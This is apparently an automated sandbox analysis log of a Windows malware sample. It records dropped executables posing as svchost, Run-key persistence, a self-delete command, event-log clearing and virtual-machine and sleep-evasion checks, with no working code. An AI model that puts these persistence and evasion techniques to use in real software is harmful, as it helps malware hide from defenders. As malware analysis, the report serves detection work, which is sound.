Source: unknown	Executable created and started: C:\Windows\XXXXXX05CA35CC\svchsot.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\v5.exe	Jump to behavior

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,

3_2_10001A20

Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior

Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\ .exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\server.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\v5.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\ .exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\server.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\v5.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to dropped file

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,

2_2_0040597D

Source: C:\Windows\Temp\server.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\SysWOW64\033726\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul			Jump to behavior

Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043D078 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,		5_2_0043D078
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A8F0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		5_2_0043A8F0

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000A4D0 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,

3_2_1000A4D0

Source: C:\Windows\Temp\v5.exe

Code function: 4_2_00407470 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,socket,inet_addr,sendto,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,CreateProcessA,TerminateProcess,Sleep,CreateProcessA,Sleep,TerminateProcess,Sleep,RtlExitUserThread,wsprintfA,Sleep,send,Sleep,RtlExitUserThread,Sleep,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,CreateProcessA,Sleep,TerminateProcess,wsprintfA,wsprintfA,wsprintfA,wsprintfA,send,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,sendto,socket,sendto,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,send,Sleep,send,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,send,wsprintfA,wsprintfA,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

4_2_00407470

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Windows\Temp\ .exe

Code function: 00-05-69 VMWARE, Inc. 00-0C-29 VMware, Inc.

5_2_00405DB0

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\Temp\server.exe	Code function: 3_2_100022F0		3_2_100022F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100022F0		8_2_100022F0

Contains functionality to detect virtual machines (IN, VMware)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10001800 in eax, dx

3_2_10001800

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\Temp\v5.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_4-1365

Found stalling execution ending in API Sleep call

Source: C:\Windows\Temp\server.exe

Stalling execution: Execution stalls by calling Sleep

graph_3-19499

Source: C:\Windows\Temp\server.exe

3_2_100018A0

Source: C:\Windows\Temp\server.exe	Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		3_2_10010760
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		8_2_10010760

Source: C:\Windows\Temp\v5.exe	Code function: 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,	2_2_00406090
Source: C:\Windows\Temp\v5.exe	Code function: GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,	4_2_00406090
Source: C:\Windows\Temp\ .exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	5_2_0042E9F0
Source: C:\Windows\Temp\ .exe	Code function: SetTimer,GetAdaptersInfo,	5_2_0042F050

Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000

Source: C:\Windows\Temp\server.exe	Window / User API: threadDelayed 826	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 504
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 514

Source: C:\Windows\Temp\v5.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_2-1569

Source: C:\Windows\Temp\server.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_3-19783
Source: C:\Windows\SysWOW64\033726\svchost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\Temp\v5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_2-1891

Source: C:\Windows\SysWOW64\033726\svchost.exe

API coverage: 9.0 %

Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100022F0		8_2_100022F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100022F0		3_2_100022F0

Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep count: 826 > 30	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep time: -148680000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7756	Thread sleep count: 116 > 30	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7756	Thread sleep time: -2088000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7772	Thread sleep time: -72000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7752	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7688	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep count: 75 > 30
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep time: -13500000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7860	Thread sleep count: 253 > 30
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868	Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep time: -180000s >= -30000s

Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C01	Jump to behavior
